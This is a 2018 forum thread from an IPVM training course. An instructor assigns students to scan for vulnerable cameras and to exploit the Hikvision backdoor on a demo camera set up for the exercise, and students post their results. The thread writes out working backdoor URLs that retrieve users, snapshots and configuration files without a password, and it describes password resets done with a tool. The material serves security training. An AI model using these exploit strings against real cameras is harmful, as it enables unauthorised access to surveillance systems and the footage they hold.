Class 10 Assignment - Scan For Vulnerabilities And Hack Our Camera!

Avatar
John Scanlan
Aug 16, 2018
IPVM • IPVMU Certified

This assignment has two parts; scan for vulnerabilities and hack our camera.

Part 1: Scan for Vulnerabilities

Using the recently released IPVM Vulnerability Scanner check your network for vulnerable devices.

Download it from the options below:

Below is a demonstration of the scanner:


Post Your Results

I performed my scan on our network that houses vulnerable equipment, so the scanner found several devices. If you do not have access to a surveillance network to scan, then you can scan our camera by manually entering 64.121.14.17.

 

Part 2: Hack Our Camera!

This week we discussed cyber security and hacking. One of the most recent and widespread backdoor exploits is the Hikvision magic string. In this homework assignment you will access a Hikvision camera running vulnerable firmware.

IPVM has put a vulnerable Hikvision camera online for members to experiment with. Access details are:

http://hikvisionbackdoor.dyndns.org [NOTE: will show login page with strong admin password]. However due to the backdoor exploit actors can now execute Hikvision CGI commands by simply appending a string that authorizes access to the camera. Some examples are below (replace "camera.ip" with the actual IP address or URL to the camera):

Retrieve a list of all users and their roles:
http://camera.ip/Security/users?auth=YWRtaW46MTEK

Obtain a camera snapshot without authentication:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

And worst of all, one can download camera configuration:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

You can also use an app that was developed to change the password. See how creative you can get with this (without disabling the camera) and post your results here!

Post Your Results

Here is an example of what homework submissions should look like.

I used the app to change the password:

With access to the camera I then changed the OSD:

Please do not attempt this on any camera other than our demo camera, and keep results professional. If you have any questions please let us know - we are happy to help.

Avatar
Astemir Karmov
Aug 16, 2018
IPVMU Certified

I was working a bit in advance but will repeat again. Today I found some Dahua cameras at the office with vulnerability.

Changed password using reset utility

And I've got access to the camera. But their web interface as usual asking to install plugin million times. I could sort out the problem by changing setting of browser, installing IE Tab or using chrome://flags/#enable-npapi  but I will not in principle because interface must be user friendly and not all end-users know how to do all manipulations mentioned above.

Hacking mission completed.

(1)
WD
Wayne Drummond
Aug 17, 2018
IPVMU Certified

 

(1)
UE
Undisclosed End User #1
Aug 17, 2018

Ran the scan and found several vulnerable devices.

AS
Ashish Singh
Aug 18, 2018
IPVMU Certified

Looks like http://hikvisionbackdoor.dyndns.org is down:

 

After running IPVM Vulnerability Scanner at my office network, here is the result:

(1)
vb
valentinus brinkmann
Aug 18, 2018
Brinkmann Electric Corp. • IPVMU Certified

 

Is the link you supplied shut down now?

This site can’t be reached

hikvisionbackdoor.dyndns.org took too long to respond.

 

ERR_CONNECTION_TIMED_OUT

LS
Leslie Slone
Aug 19, 2018
IPVMU Certified

Assignment 10 Homework Part 1:

LS
Leslie Slone
Aug 19, 2018
IPVMU Certified

Assignment 10 Part 2:

I just tried http://hikvisionbackdoor.dyndns.org and it came up "This Site Can't Be Reached".

Will try again later.

U
Undisclosed #2
Aug 19, 2018

Avatar
Austin Leaming
Aug 19, 2018
ACSC • IPVMU Certified

I think this device is my PS4? It's the only Sony device on my network. 

MB
Matthew Bradley
Aug 19, 2018
MotorCity Casino • IPVMU Certified

I have also been getting an error for the link.

But.... Part 1

UR
Ushaan Raveendiran
Aug 21, 2018
IPVMU Certified

Part 1: 

Part 2 : Hacking

First I tried the copy and past, can't believe how simple it is.

User Name and User Level:

Snap Shot of the Camera:

Changed the Password with the password reset tool:

MB
Matthew Bradley
Aug 21, 2018
MotorCity Casino • IPVMU Certified

Looks like it is working now.

Hack on the admin account was successful.

SJ
Sushil Jadhav
Aug 21, 2018

Part 01: Vulnerability found

Part 02: Hacking the camera

1) accessed the user list using

http://camera.ip/Security/users?auth=YWRtaW46MTEK

2) Changed the password

3) Changed the OSD message

4) Retrieved the snapshot using 

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK 

Again changed it to default

RB
Rachael Babatu
Aug 21, 2018
IPVMU Certified

It appears that the website is down.

JB
John Brabbins
Aug 21, 2018
IPVMU Certified

I used the suggested IP address to check the suggested camera's vulnerability.

I also used the backdoor link to check the users and roles for the cameras.

Unfortunately, I am unable to install the HikPassword Reset on my Mac.

Avatar
John Scanlan
Aug 22, 2018
IPVM • IPVMU Certified

The camera used for this assignment is online.  If you had any difficulty connecting, please try again. My apologies for any inconvenience and thank you.

SR
Sheila Rossman
Aug 23, 2018
IPVMU Certified

I was able to do the vulnerability scan, check for users but the list seemed empty other than admin, I took a snapshot of the camera but I couldn't open the system config file.  I was able to use the password reset tool.

 

 

 

UD
Undisclosed Distributor #3
Aug 23, 2018

DC
Dustin Collins
Aug 23, 2018

 

 

 

 

 

 

No luck with the laptop I have for this assignment. windows 7 I am running.

PN
Pedro Navalpotro
Aug 23, 2018
IPVMU Certified

hi there

first part of this coursework to scann the camera given in this example so i dont have Access to any camera these days.

 

 

second part i have change the password but i am not able to see any image from that camera, i am not sure if i have the códec necessary for this.

 

 

regards

UE
Undisclosed End User #4
Aug 28, 2018

 

 

asking to install plug ins unable too but did gain access to the camera and reset the password

GB
Glenn Benoit
Aug 29, 2018
IPVMU Certified

using the app i changed the password to 12345abcd

which then allowed to to access your camera and have a little fun!

 

UE
Undisclosed End User #1
Aug 29, 2018

I used the app to change the password and I was able to access the camera online. It kept asking for a plugin so I could view the camera but I was able to get the camera info.

 

 

Avatar
Daniel Gregory
Aug 30, 2018
IPVMU Certified

Ran the vulnerability scanner and found that there are no vulnerabilities on my network. I have a HikVision CCTV System on this network so this is reassuring.

 

 

I used the HikVision Password Reset tool to change the password to 12345daniel

 

 

I was able to get into the camera with full admin rights. 

 

 

I am extremely surprised at how easy this hack is and can only imagine how many cameras are out there on the net that are vulnerable to this exploit.

New discussion

Ask questions and get answers to your physical security questions from IPVM team members and fellow subscribers.

Newest discussions